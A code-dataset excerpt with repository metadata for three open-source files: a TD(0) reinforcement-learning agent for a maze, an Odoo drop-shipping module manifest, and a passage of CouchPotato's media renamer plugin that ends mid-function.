4686
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright (c) 2014,2015,2016,2017 Jeremie DECOCK (http://www.jdhp.org)
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
# TODO: improve this ?
if __name__ == '__main__':
import agent
else:
from . import agent
import numpy as np
class Agent(agent.Agent):
"""
Temporal Difference Learning "TD(0)".
This is a passive RL algorithm (approximate V function for a given policy).
Parameters:
- self.learningRate : the learning rate (often noted alpha)
- self.discountFactor : the discount factor (often noted gamma)
See: Stuart Russell, Peter Norvig, "Intelligence artificielle", 2e édition,
Pearson, 2006, pp. 854-857.
"""
def __init__(self, environment, policy, number_of_simulations = 10000):
self.environment = environment
self.policy = policy
self.learningRate = lambda n : 1.0/n
self.discountFactor = 0.999
initial_state_set = {None} # perform all simulations from the default initial state (some states may not be explored...)
#initial_state_set = environment.stateSet # perform simulations from all states (all states are explored)
# Init value utility to 0
self.valueUtility = {state:None for state in self.environment.stateSet}
self.stateVisitDict = {state:0 for state in self.environment.stateSet}
for initial_state in initial_state_set:
for simulation_index in range(number_of_simulations):
# Do the simulation
(state_list, action_list, reward_list) = environment.simulate(self, initial_state=initial_state, max_it=100)
previous_state = None
previous_reward = None
for index in range(len(state_list)):
current_state = state_list[index]
current_reward = reward_list[index]
if self.valueUtility[current_state] is None:
self.valueUtility[current_state] = current_reward
if previous_state is not None:
#print(index, previous_state, previous_reward, current_state, current_reward, self.valueUtility[previous_state], self.valueUtility[current_state])
self.stateVisitDict[previous_state] += 1 # What about the last visited state of the simulation ? -> no problem as we won't call alpha(current_state) but only alpha(previous_state)
alpha = self.learningRate(self.stateVisitDict[previous_state])
self.valueUtility[previous_state] = self.valueUtility[previous_state] + alpha * (previous_reward + self.discountFactor * self.valueUtility[current_state] - self.valueUtility[previous_state])
previous_state = current_state
previous_reward = current_reward
# Display
#print(self.valueUtility)
#environment.displayValueFunction(self.valueUtility, iteration=simulation_index)
environment.displayValueFunction(self.valueUtility, iteration=simulation_index)
def getAction(self, state):
"""
Returns the action to be performed by the agent for a given state.
"""
action = self.policy[state]
return action
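# A standalone sketch (for illustration; not used by the Agent class) of the single
# TD(0) backup applied inside the simulation loop above:
#     V(s) <- V(s) + alpha * (r + gamma * V(s') - V(s))
def td0_backup(value_utility, state, reward, next_state, alpha, gamma=0.999):
    """Return the updated utility estimate for `state` after observing (reward, next_state)."""
    return value_utility[state] + alpha * (reward + gamma * value_utility[next_state] - value_utility[state])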
if __name__ == '__main__':
from environment.maze import Environment
environment = Environment()
policy = { (0,2):'right', (1,2):'right', (2,2):'right',
(0,1):'up', (2,1):'up',
(0,0):'up', (1,0):'left', (2,0):'left', (3,0):'left' }
agent = Agent(environment, policy)
|
mit
|
gsmartway/odoo
|
addons/stock_dropshipping/__openerp__.py
|
260
|
2037
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2014 OpenERP S.A. (<http://www.openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Drop Shipping',
'version': '1.0',
'category': 'Warehouse Management',
'summary': 'Drop Shipping',
'description': """
Manage drop shipping orders
===========================
This module adds a pre-configured Drop Shipping picking type
as well as a procurement route that allow configuring Drop
Shipping products and orders.
When drop shipping is used the goods are directly transferred
from suppliers to customers (direct delivery) without
going through the retailer's warehouse. In this case no
internal transfer document is needed.
""",
'author': 'OpenERP SA',
'website': 'https://www.odoo.com/page/warehouse',
'depends': ['purchase', 'sale_stock'],
'data': ['stock_dropshipping.xml'],
'test': [
'test/cancellation_propagated.yml',
'test/crossdock.yml',
'test/dropship.yml',
'test/procurementexception.yml',
'test/lifo_price.yml'
],
'installable': True,
'auto_install': False,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
agpl-3.0
|
multikatt/CouchPotatoServer
|
couchpotato/core/plugins/renamer.py
|
13
|
70976
|
import fnmatch
import os
import re
import shutil
import time
import traceback
from couchpotato import get_db
from couchpotato.api import addApiView
from couchpotato.core.event import addEvent, fireEvent, fireEventAsync
from couchpotato.core.helpers.encoding import toUnicode, ss, sp
from couchpotato.core.helpers.variable import getExt, mergeDicts, getTitle, \
getImdb, link, symlink, tryInt, splitString, fnEscape, isSubFolder, \
getIdentifier, randomString, getFreeSpace, getSize
from couchpotato.core.logger import CPLog
from couchpotato.core.plugins.base import Plugin
from couchpotato.environment import Env
from unrar2 import RarFile
import six
from six.moves import filter
log = CPLog(__name__)
autoload = 'Renamer'
class Renamer(Plugin):
renaming_started = False
checking_snatched = False
def __init__(self):
addApiView('renamer.scan', self.scanView, docs = {
'desc': 'For the renamer to check for new files to rename in a folder',
'params': {
                'async': {'desc': 'Optional: Set to 1 to fire the renamer.scan asynchronously.'},
'to_folder': {'desc': 'Optional: The folder to move releases to. Leave empty for default folder.'},
'media_folder': {'desc': 'Optional: The folder of the media to scan. Keep empty for default renamer folder.'},
'files': {'desc': 'Optional: Provide the release files if more releases are in the same media_folder, delimited with a \'|\'. Note that no dedicated release folder is expected for releases with one file.'},
'base_folder': {'desc': 'Optional: The folder to find releases in. Leave empty for default folder.'},
'downloader': {'desc': 'Optional: The downloader the release has been downloaded with. \'download_id\' is required with this option.'},
'download_id': {'desc': 'Optional: The nzb/torrent ID of the release in media_folder. \'downloader\' is required with this option.'},
'status': {'desc': 'Optional: The status of the release: \'completed\' (default) or \'seeding\''},
},
})
addApiView('renamer.progress', self.getProgress, docs = {
'desc': 'Get the progress of current renamer scan',
'return': {'type': 'object', 'example': """{
'progress': False || True,
}"""},
})
addEvent('renamer.scan', self.scan)
addEvent('renamer.check_snatched', self.checkSnatched)
addEvent('app.load', self.scan)
addEvent('app.load', self.setCrons)
# Enable / disable interval
addEvent('setting.save.renamer.enabled.after', self.setCrons)
addEvent('setting.save.renamer.run_every.after', self.setCrons)
addEvent('setting.save.renamer.force_every.after', self.setCrons)
def setCrons(self):
fireEvent('schedule.remove', 'renamer.check_snatched')
if self.isEnabled() and self.conf('run_every') > 0:
fireEvent('schedule.interval', 'renamer.check_snatched', self.checkSnatched, minutes = self.conf('run_every'), single = True)
fireEvent('schedule.remove', 'renamer.check_snatched_forced')
if self.isEnabled() and self.conf('force_every') > 0:
fireEvent('schedule.interval', 'renamer.check_snatched_forced', self.scan, hours = self.conf('force_every'), single = True)
return True
def getProgress(self, **kwargs):
return {
'progress': self.renaming_started
}
def scanView(self, **kwargs):
async = tryInt(kwargs.get('async', 0))
base_folder = kwargs.get('base_folder')
media_folder = sp(kwargs.get('media_folder'))
to_folder = kwargs.get('to_folder')
# Backwards compatibility, to be removed after a few versions :)
if not media_folder:
media_folder = sp(kwargs.get('movie_folder'))
downloader = kwargs.get('downloader')
download_id = kwargs.get('download_id')
files = [sp(filename) for filename in splitString(kwargs.get('files'), '|')]
status = kwargs.get('status', 'completed')
release_download = None
if not base_folder and media_folder:
release_download = {'folder': media_folder}
if download_id:
release_download.update({
'id': download_id,
'downloader': downloader,
'status': status,
'files': files
})
fire_handle = fireEvent if not async else fireEventAsync
fire_handle('renamer.scan', base_folder = base_folder, release_download = release_download, to_folder = to_folder)
return {
'success': True
}
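    # A hypothetical example call of the renamer.scan API registered above (host, port
    # and api key are placeholders for a default CouchPotato setup):
    #   http://localhost:5050/api/<api_key>/renamer.scan/?media_folder=/downloads/Some.Movie.2014&async=1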
def scan(self, base_folder = None, release_download = None, to_folder = None):
if not release_download: release_download = {}
if self.isDisabled():
return
if self.renaming_started is True:
log.info('Renamer is already running, if you see this often, check the logs above for errors.')
return
if not base_folder:
base_folder = sp(self.conf('from'))
from_folder = sp(self.conf('from'))
if not to_folder:
to_folder = sp(self.conf('to'))
# Get media folder to process
media_folder = sp(release_download.get('folder'))
# Get all folders that should not be processed
no_process = [to_folder]
cat_list = fireEvent('category.all', single = True) or []
no_process.extend([item['destination'] for item in cat_list])
# Check to see if the no_process folders are inside the "from" folder.
if not os.path.isdir(base_folder) or not os.path.isdir(to_folder):
log.error('Both the "To" and "From" folder have to exist.')
return
else:
for item in no_process:
if isSubFolder(item, base_folder):
log.error('To protect your data, the media libraries can\'t be inside of or the same as the "from" folder. "%s" in "%s"', (item, base_folder))
return
# Check to see if the no_process folders are inside the provided media_folder
if media_folder and not os.path.isdir(media_folder):
log.debug('The provided media folder %s does not exist. Trying to find it in the \'from\' folder.', media_folder)
# Update to the from folder
if len(release_download.get('files', [])) == 1:
new_media_folder = sp(from_folder)
else:
new_media_folder = sp(os.path.join(from_folder, os.path.basename(media_folder)))
if not os.path.isdir(new_media_folder):
log.error('The provided media folder %s does not exist and could also not be found in the \'from\' folder.', media_folder)
return
# Update the files
new_files = [os.path.join(new_media_folder, os.path.relpath(filename, media_folder)) for filename in release_download.get('files', [])]
if new_files and not os.path.isfile(new_files[0]):
log.error('The provided media folder %s does not exist and its files could also not be found in the \'from\' folder.', media_folder)
return
# Update release_download info to the from folder
log.debug('Release %s found in the \'from\' folder.', media_folder)
release_download['folder'] = new_media_folder
release_download['files'] = new_files
media_folder = new_media_folder
if media_folder:
for item in no_process:
if isSubFolder(item, media_folder):
log.error('To protect your data, the media libraries can\'t be inside of or the same as the provided media folder. "%s" in "%s"', (item, media_folder))
return
# Make sure checkSnatched has marked all downloads/seeds as such
if not release_download and self.conf('run_every') > 0:
self.checkSnatched(fire_scan = False)
self.renaming_started = True
# make sure the media folder name is included in the search
folder = None
files = []
if media_folder:
log.info('Scanning media folder %s...', media_folder)
folder = os.path.dirname(media_folder)
release_files = release_download.get('files', [])
if release_files:
files = release_files
# If there is only one file in the torrent, the downloader did not create a subfolder
if len(release_files) == 1:
folder = media_folder
else:
# Get all files from the specified folder
try:
for root, folders, names in os.walk(media_folder):
files.extend([sp(os.path.join(root, name)) for name in names])
except:
log.error('Failed getting files from %s: %s', (media_folder, traceback.format_exc()))
db = get_db()
# Extend the download info with info stored in the downloaded release
keep_original = self.moveTypeIsLinked()
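# keep_original: leave the source files untouched (link/copy actions); torrents force this below
# unless the file action is an explicit move, so seeding keeps working.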
is_torrent = False
if release_download:
release_download = self.extendReleaseDownload(release_download)
is_torrent = self.downloadIsTorrent(release_download)
keep_original = True if is_torrent and self.conf('file_action') not in ['move'] else keep_original
# Unpack any archives
extr_files = None
if self.conf('unrar'):
folder, media_folder, files, extr_files = self.extractFiles(folder = folder, media_folder = media_folder, files = files,
cleanup = self.conf('cleanup') and not keep_original)
groups = fireEvent('scanner.scan', folder = folder if folder else base_folder,
files = files, release_download = release_download, return_ignored = False, single = True) or []
folder_name = self.conf('folder_name')
file_name = self.conf('file_name')
trailer_name = self.conf('trailer_name')
nfo_name = self.conf('nfo_name')
separator = self.conf('separator')
if len(file_name) == 0:
log.error('Please fill in the filename option under the renamer settings. Forcing it to <original>.<ext> to keep the same name as the source file.')
file_name = '<original>.<ext>'
cd_keys = ['<cd>','<cd_nr>', '<original>']
if not any(x in folder_name for x in cd_keys) and not any(x in file_name for x in cd_keys):
log.error('Missing `cd` or `cd_nr` in the renamer. This will cause multi-file releases to be renamed to the same file. '
'Please add it in the renamer settings. Force adding it for now.')
file_name = '%s %s' % ('<cd>', file_name)
# Tag release folder as failed_rename in case no groups were found. This prevents check_snatched from removing the release from the downloader.
if not groups and self.statusInfoComplete(release_download):
self.tagRelease(release_download = release_download, tag = 'failed_rename')
for group_identifier in groups:
group = groups[group_identifier]
group['release_download'] = None
rename_files = {}
remove_files = []
remove_releases = []
media_title = getTitle(group)
# Add _UNKNOWN_ if no library item is connected
if not group.get('media') or not media_title:
self.tagRelease(group = group, tag = 'unknown')
continue
# Rename the files using the library data
else:
# Media not in library, add it first
if not group['media'].get('_id'):
group['media'] = fireEvent('movie.add', params = {
'identifier': group['identifier'],
'profile_id': None
}, search_after = False, status = 'done', single = True)
else:
group['media'] = fireEvent('movie.update', media_id = group['media'].get('_id'), single = True)
if not group['media'] or not group['media'].get('_id'):
log.error('Could not rename, no library item to work with: %s', group_identifier)
continue
media = group['media']
media_title = getTitle(media)
# Overwrite destination when set in category
destination = to_folder
category_label = ''
if media.get('category_id') and media.get('category_id') != '-1':
try:
category = db.get('id', media['category_id'])
category_label = category['label']
if category['destination'] and len(category['destination']) > 0 and category['destination'] != 'None':
destination = sp(category['destination'])
log.debug('Setting category destination for "%s": %s' % (media_title, destination))
else:
log.debug('No category destination found for "%s"' % media_title)
except:
log.error('Failed getting category label: %s', traceback.format_exc())
# Find subtitle for renaming
group['before_rename'] = []
fireEvent('renamer.before', group)
# Add extracted files to the before_rename list
if extr_files:
group['before_rename'].extend(extr_files)
# Remove weird chars from movie name
movie_name = re.sub(r"[\x00\/\\:\*\?\"<>\|]", '', media_title)
# Put 'The' at the end
name_the = movie_name
for prefix in ['the ', 'an ', 'a ']:
if prefix == movie_name[:len(prefix)].lower():
name_the = movie_name[len(prefix):] + ', ' + prefix.strip().capitalize()
break
replacements = {
'ext': 'mkv',
'namethe': name_the.strip(),
'thename': movie_name.strip(),
'year': media['info']['year'],
'first': name_the[0].upper(),
'quality': group['meta_data']['quality']['label'],
'quality_type': group['meta_data']['quality_type'],
'video': group['meta_data'].get('video'),
'audio': group['meta_data'].get('audio'),
'group': group['meta_data']['group'],
'source': group['meta_data']['source'],
'resolution_width': group['meta_data'].get('resolution_width'),
'resolution_height': group['meta_data'].get('resolution_height'),
'audio_channels': group['meta_data'].get('audio_channels'),
'imdb_id': group['identifier'],
'cd': '',
'cd_nr': '',
'mpaa': media['info'].get('mpaa', ''),
'mpaa_only': media['info'].get('mpaa', ''),
'category': category_label,
'3d': '3D' if group['meta_data']['quality'].get('is_3d', 0) else '',
'3d_type': group['meta_data'].get('3d_type'),
}
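# These values fill the <tag> placeholders in the folder/file naming templates via doReplace() below.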
if replacements['mpaa_only'] not in ('G', 'PG', 'PG-13', 'R', 'NC-17'):
replacements['mpaa_only'] = 'Not Rated'
for file_type in group['files']:
# Move nfo depending on settings
if file_type == 'nfo' and not self.conf('rename_nfo'):
log.debug('Skipping, renaming of %s disabled', file_type)
for current_file in group['files'][file_type]:
if self.conf('cleanup') and (not keep_original or self.fileIsAdded(current_file, group)):
remove_files.append(current_file)
continue
# Subtitle extra
if file_type == 'subtitle_extra':
continue
# Move other files
multiple = len(group['files'][file_type]) > 1 and not group['is_dvd']
cd = 1 if multiple else 0
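# cd starts counting at 1 for multi-part releases; 0 keeps the <cd>/<cd_nr> tags empty.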
for current_file in sorted(list(group['files'][file_type])):
current_file = sp(current_file)
# Original filename
replacements['original'] = os.path.splitext(os.path.basename(current_file))[0]
replacements['original_folder'] = fireEvent('scanner.remove_cptag', group['dirname'], single = True)
if not replacements['original_folder'] or len(replacements['original_folder']) == 0:
replacements['original_folder'] = replacements['original']
# Extension
replacements['ext'] = getExt(current_file)
# cd #
replacements['cd'] = ' cd%d' % cd if multiple else ''
replacements['cd_nr'] = cd if multiple else ''
# Naming
final_folder_name = self.doReplace(folder_name, replacements, folder = True)
final_file_name = self.doReplace(file_name, replacements)
replacements['filename'] = final_file_name[:-(len(getExt(final_file_name)) + 1)]
# Meta naming
if file_type == 'trailer':
final_file_name = self.doReplace(trailer_name, replacements, remove_multiple = True)
elif file_type == 'nfo':
final_file_name = self.doReplace(nfo_name, replacements, remove_multiple = True)
# Move DVD files (no structure renaming)
if group['is_dvd'] and file_type == 'movie':
found = False
for top_dir in ['video_ts', 'audio_ts', 'bdmv', 'certificate']:
has_string = current_file.lower().find(os.path.sep + top_dir + os.path.sep)
if has_string >= 0:
structure_dir = current_file[has_string:].lstrip(os.path.sep)
rename_files[current_file] = os.path.join(destination, final_folder_name, structure_dir)
found = True
break
if not found:
log.error('Could not determine dvd structure for: %s', current_file)
# Do rename others
else:
if file_type == 'leftover':
if self.conf('move_leftover'):
rename_files[current_file] = os.path.join(destination, final_folder_name, os.path.basename(current_file))
elif file_type not in ['subtitle']:
rename_files[current_file] = os.path.join(destination, final_folder_name, final_file_name)
# Check for extra subtitle files
if file_type == 'subtitle':
remove_multiple = False
if len(group['files']['movie']) == 1:
remove_multiple = True
sub_langs = group['subtitle_language'].get(current_file, [])
# rename subtitles with or without language
sub_name = self.doReplace(file_name, replacements, remove_multiple = remove_multiple)
rename_files[current_file] = os.path.join(destination, final_folder_name, sub_name)
rename_extras = self.getRenameExtras(
extra_type = 'subtitle_extra',
replacements = replacements,
folder_name = folder_name,
file_name = file_name,
destination = destination,
group = group,
current_file = current_file,
remove_multiple = remove_multiple,
)
# Don't add language if multiple languages in 1 subtitle file
if len(sub_langs) == 1:
sub_suffix = '%s.%s' % (sub_langs[0], replacements['ext'])
# Don't add language to the subtitle file if it's already there
if not sub_name.endswith(sub_suffix):
sub_name = sub_name.replace(replacements['ext'], sub_suffix)
rename_files[current_file] = os.path.join(destination, final_folder_name, sub_name)
rename_files = mergeDicts(rename_files, rename_extras)
# Filename without cd etc
elif file_type == 'movie':
rename_extras = self.getRenameExtras(
extra_type = 'movie_extra',
replacements = replacements,
folder_name = folder_name,
file_name = file_name,
destination = destination,
group = group,
current_file = current_file
)
rename_files = mergeDicts(rename_files, rename_extras)
group['filename'] = self.doReplace(file_name, replacements, remove_multiple = True)[:-(len(getExt(final_file_name)) + 1)]
group['destination_dir'] = os.path.join(destination, final_folder_name)
if multiple:
cd += 1
# Before renaming, remove the lower quality files
remove_leftovers = True
# Get media quality profile
profile = None
if media.get('profile_id'):
try:
profile = db.get('id', media['profile_id'])
except:
# Set profile to None as it does not exist anymore
mdia = db.get('id', media['_id'])
mdia['profile_id'] = None
db.update(mdia)
log.error('Error getting quality profile for %s: %s', (media_title, traceback.format_exc()))
else:
log.debug('Media has no quality profile: %s', media_title)
# Mark media for dashboard
mark_as_recent = False
# Go over current movie releases
for release in fireEvent('release.for_media', media['_id'], single = True):
# When a release already exists
if release.get('status') == 'done':
# This is where CP removes older, lesser quality releases or releases that are not wanted anymore
is_higher = fireEvent('quality.ishigher', \
group['meta_data']['quality'], {'identifier': release['quality'], 'is_3d': release.get('is_3d', False)}, profile, single = True)
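# 'higher' or 'equal' means the new download replaces the existing files (better quality or repack);
# anything else keeps the existing release and cancels this rename.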
if is_higher == 'higher':
log.info('Removing lesser or not wanted quality release of %s (%s).', (media_title, release.get('quality')))
for file_type in release.get('files', {}):
for release_file in release['files'][file_type]:
remove_files.append(release_file)
remove_releases.append(release)
# Same quality, but still downloaded, so maybe repack/proper/unrated/directors cut etc
elif is_higher == 'equal':
log.info('Same quality release already exists for %s, with quality %s. Assuming repack.', (media_title, release.get('quality')))
for file_type in release.get('files', {}):
for release_file in release['files'][file_type]:
remove_files.append(release_file)
remove_releases.append(release)
# Downloaded a lower quality, rename the newly downloaded files/folder to exclude them from scan
else:
log.info('Better quality release already exists for %s, with quality %s', (media_title, release.get('quality')))
# Add exists tag to the .ignore file
self.tagRelease(group = group, tag = 'exists')
# Notify on rename fail
download_message = 'Renaming of %s (%s) cancelled, exists in %s already.' % (media_title, group['meta_data']['quality']['label'], release.get('quality'))
fireEvent('movie.renaming.canceled', message = download_message, data = group)
remove_leftovers = False
break
elif release.get('status') in ['snatched', 'seeding']:
if release_download and release_download.get('release_id'):
if release_download['release_id'] == release['_id']:
if release_download['status'] == 'completed':
# Set the release to downloaded
fireEvent('release.update_status', release['_id'], status = 'downloaded', single = True)
group['release_download'] = release_download
mark_as_recent = True
elif release_download['status'] == 'seeding':
# Set the release to seeding
fireEvent('release.update_status', release['_id'], status = 'seeding', single = True)
mark_as_recent = True
elif release.get('quality') == group['meta_data']['quality']['identifier']:
# Set the release to downloaded
fireEvent('release.update_status', release['_id'], status = 'downloaded', single = True)
group['release_download'] = release_download
mark_as_recent = True
# Mark media for dashboard
if mark_as_recent:
fireEvent('media.tag', group['media'].get('_id'), 'recent', update_edited = True, single = True)
# Remove leftover files
if not remove_leftovers: # Don't remove anything
continue
log.debug('Removing leftover files')
for current_file in group['files']['leftover']:
if self.conf('cleanup') and not self.conf('move_leftover') and \
(not keep_original or self.fileIsAdded(current_file, group)):
remove_files.append(current_file)
if self.conf('check_space'):
total_space, available_space = getFreeSpace(destination)
renaming_size = getSize(rename_files.keys())
if renaming_size > available_space:
log.error('Not enough space left, need %s MB but only %s MB available', (renaming_size, available_space))
self.tagRelease(group = group, tag = 'not_enough_space')
continue
# Remove files
delete_folders = []
for src in remove_files:
if rename_files.get(src):
log.debug('Not removing file that will be renamed: %s', src)
continue
log.info('Removing "%s"', src)
try:
src = sp(src)
if os.path.isfile(src):
os.remove(src)
parent_dir = os.path.dirname(src)
if parent_dir not in delete_folders and os.path.isdir(parent_dir) and \
not isSubFolder(destination, parent_dir) and not isSubFolder(media_folder, parent_dir) and \
isSubFolder(parent_dir, base_folder):
delete_folders.append(parent_dir)
except:
log.error('Failed removing %s: %s', (src, traceback.format_exc()))
self.tagRelease(group = group, tag = 'failed_remove')
# Delete leftover folder from older releases
delete_folders = sorted(delete_folders, key = len, reverse = True)
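# Longest paths first, so nested subfolders are removed before their parents.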
for delete_folder in delete_folders:
try:
self.deleteEmptyFolder(delete_folder, show_error = False)
except Exception as e:
log.error('Failed to delete folder: %s %s', (e, traceback.format_exc()))
# Rename all files marked
group['renamed_files'] = []
failed_rename = False
for src in rename_files:
if rename_files[src]:
dst = rename_files[src]
if dst in group['renamed_files']:
log.error('File "%s" already renamed once, adding random string at the end to prevent data loss', dst)
dst = '%s.random-%s' % (dst, randomString())
# Create dir
self.makeDir(os.path.dirname(dst))
try:
self.moveFile(src, dst, use_default = not is_torrent or self.fileIsAdded(src, group))
group['renamed_files'].append(dst)
except:
log.error('Failed renaming the file "%s" : %s', (os.path.basename(src), traceback.format_exc()))
failed_rename = True
break
# If renaming failed tag the release folder as failed and continue with next group. Note that all old files have already been deleted.
if failed_rename:
self.tagRelease(group = group, tag = 'failed_rename')
continue
# If renaming succeeded, make sure it is not tagged as failed (scanner didn't return a group, but a download_ID was provided in an earlier attempt)
else:
self.untagRelease(group = group, tag = 'failed_rename')
# Tag folder if it is in the 'from' folder and it will not be removed because it is a torrent
if self.movieInFromFolder(media_folder) and keep_original:
self.tagRelease(group = group, tag = 'renamed_already')
# Remove matching releases
for release in remove_releases:
log.debug('Removing release %s', release.get('identifier'))
try:
db.delete(release)
except:
log.error('Failed removing %s: %s', (release, traceback.format_exc()))
if group['dirname'] and group['parentdir'] and not keep_original:
if media_folder:
# Delete the movie folder
group_folder = media_folder
else:
# Delete the first empty subfolder in the tree relative to the 'from' folder
group_folder = sp(os.path.join(base_folder, os.path.relpath(group['parentdir'], base_folder).split(os.path.sep)[0]))
try:
if self.conf('cleanup') or self.conf('move_leftover'):
log.info('Deleting folder: %s', group_folder)
self.deleteEmptyFolder(group_folder)
except:
log.error('Failed removing %s: %s', (group_folder, traceback.format_exc()))
# Notify on download, search for trailers etc
download_message = 'Downloaded %s (%s%s)' % (media_title, replacements['quality'], (' ' + replacements['3d']) if replacements['3d'] else '')
try:
fireEvent('renamer.after', message = download_message, group = group, in_order = True)
except:
log.error('Failed firing (some) of the renamer.after events: %s', traceback.format_exc())
# Break if CP wants to shut down
if self.shuttingDown():
break
self.renaming_started = False
def getRenameExtras(self, extra_type = '', replacements = None, folder_name = '', file_name = '', destination = '', group = None, current_file = '', remove_multiple = False):
if not group: group = {}
if not replacements: replacements = {}
replacements = replacements.copy()
rename_files = {}
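# An extra file belongs to the current movie file when it shares the same base name (path minus extension).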
def test(s):
return current_file[:-len(replacements['ext'])] in sp(s)
for extra in set(filter(test, group['files'][extra_type])):
replacements['ext'] = getExt(extra)
final_folder_name = self.doReplace(folder_name, replacements, remove_multiple = remove_multiple, folder = True)
final_file_name = self.doReplace(file_name, replacements, remove_multiple = remove_multiple)
rename_files[extra] = os.path.join(destination, final_folder_name, final_file_name)
return rename_files
# This adds a file to ignore / tag a release so it is ignored later
def tagRelease(self, tag, group = None, release_download = None):
if not tag:
return
text = """This file is from CouchPotato
It has marked this release as "%s"
This file hides the release from the renamer
Remove it if you want it to be renamed (again, or at least let it try again)
""" % tag
tag_files = []
# Tag movie files if they are known
if isinstance(group, dict):
tag_files = [sorted(list(group['files']['movie']))[0]]
elif isinstance(release_download, dict):
# Tag download_files if they are known
if release_download.get('files', []):
tag_files = [filename for filename in release_download.get('files', []) if os.path.exists(filename)]
# Tag all files in release folder
elif release_download['folder']:
for root, folders, names in os.walk(sp(release_download['folder'])):
tag_files.extend([os.path.join(root, name) for name in names])
for filename in tag_files:
# Don't tag .ignore files
if os.path.splitext(filename)[1] == '.ignore':
continue
tag_filename = '%s.%s.ignore' % (os.path.splitext(filename)[0], tag)
if not os.path.isfile(tag_filename):
self.createFile(tag_filename, text)
def untagRelease(self, group = None, release_download = None, tag = ''):
if not release_download:
return
tag_files = []
folder = None
# Tag movie files if they are known
if isinstance(group, dict):
tag_files = [sorted(list(group['files']['movie']))[0]]
folder = sp(group['parentdir'])
if not group.get('dirname') or not os.path.isdir(folder):
return False
elif isinstance(release_download, dict):
folder = sp(release_download['folder'])
if not os.path.isdir(folder):
return False
# Untag download_files if they are known
if release_download.get('files'):
tag_files = release_download.get('files', [])
# Untag all files in release folder
else:
for root, folders, names in os.walk(folder):
tag_files.extend([sp(os.path.join(root, name)) for name in names if not os.path.splitext(name)[1] == '.ignore'])
if not folder:
return False
# Find all .ignore files in folder
ignore_files = []
for root, dirnames, filenames in os.walk(folder):
ignore_files.extend(fnmatch.filter([sp(os.path.join(root, filename)) for filename in filenames], '*%s.ignore' % tag))
# Match all found ignore files with the tag_files and delete if found
for tag_file in tag_files:
ignore_file = fnmatch.filter(ignore_files, fnEscape('%s.%s.ignore' % (os.path.splitext(tag_file)[0], tag if tag else '*')))
for filename in ignore_file:
try:
os.remove(filename)
except:
log.debug('Unable to remove ignore file: %s. Error: %s.' % (filename, traceback.format_exc()))
def hastagRelease(self, release_download, tag = ''):
if not release_download:
return False
folder = sp(release_download['folder'])
if not os.path.isdir(folder):
return False
tag_files = []
ignore_files = []
# Find tag on download_files if they are known
if release_download.get('files'):
tag_files = release_download.get('files', [])
# Find tag on all files in release folder
else:
for root, folders, names in os.walk(folder):
tag_files.extend([sp(os.path.join(root, name)) for name in names if not os.path.splitext(name)[1] == '.ignore'])
# Find all .ignore files in folder
for root, dirnames, filenames in os.walk(folder):
ignore_files.extend(fnmatch.filter([sp(os.path.join(root, filename)) for filename in filenames], '*%s.ignore' % tag))
# Match all found ignore files with the tag_files and return True found
for tag_file in tag_files:
ignore_file = fnmatch.filter(ignore_files, fnEscape('%s.%s.ignore' % (os.path.splitext(tag_file)[0], tag if tag else '*')))
if ignore_file:
return True
return False
def moveFile(self, old, dest, use_default = False):
dest = sp(dest)
try:
if os.path.exists(dest) and os.path.isfile(dest):
raise Exception('Destination "%s" already exists' % dest)
move_type = self.conf('file_action')
if use_default:
move_type = self.conf('default_file_action')
if move_type not in ['copy', 'link']:
try:
log.info('Moving "%s" to "%s"', (old, dest))
shutil.move(old, dest)
except:
exists = os.path.exists(dest)
if exists and os.path.getsize(old) == os.path.getsize(dest):
log.error('Successfully moved file "%s", but something went wrong: %s', (dest, traceback.format_exc()))
os.unlink(old)
else:
# remove the faulty, partially copied file
if exists:
os.unlink(dest)
raise
elif move_type == 'copy':
log.info('Copying "%s" to "%s"', (old, dest))
shutil.copy(old, dest)
else:
log.info('Linking "%s" to "%s"', (old, dest))
# First try to hardlink
try:
log.debug('Hardlinking file "%s" to "%s"...', (old, dest))
link(old, dest)
except:
# Try to symlink next
log.debug('Couldn\'t hardlink file "%s" to "%s". Symlinking instead. Error: %s.', (old, dest, traceback.format_exc()))
shutil.copy(old, dest)
try:
old_link = '%s.link' % sp(old)
symlink(dest, old_link)
os.unlink(old)
os.rename(old_link, old)
except:
log.error('Couldn\'t symlink file "%s" to "%s". Copied instead. Error: %s. ', (old, dest, traceback.format_exc()))
try:
os.chmod(dest, Env.getPermission('file'))
if os.name == 'nt' and self.conf('ntfs_permission'):
os.popen('icacls "' + dest + '"* /reset /T')
except:
log.debug('Failed setting permissions for file: %s, %s', (dest, traceback.format_exc(1)))
except:
log.error('Couldn\'t move file "%s" to "%s": %s', (old, dest, traceback.format_exc()))
raise
return True
def doReplace(self, string, replacements, remove_multiple = False, folder = False):
"""
Replace the <config> placeholders in the naming string with their actual values
"""
replacements = replacements.copy()
if remove_multiple:
replacements['cd'] = ''
replacements['cd_nr'] = ''
replaced = toUnicode(string)
for x, r in replacements.items():
if x in ['thename', 'namethe']:
continue
if r is not None:
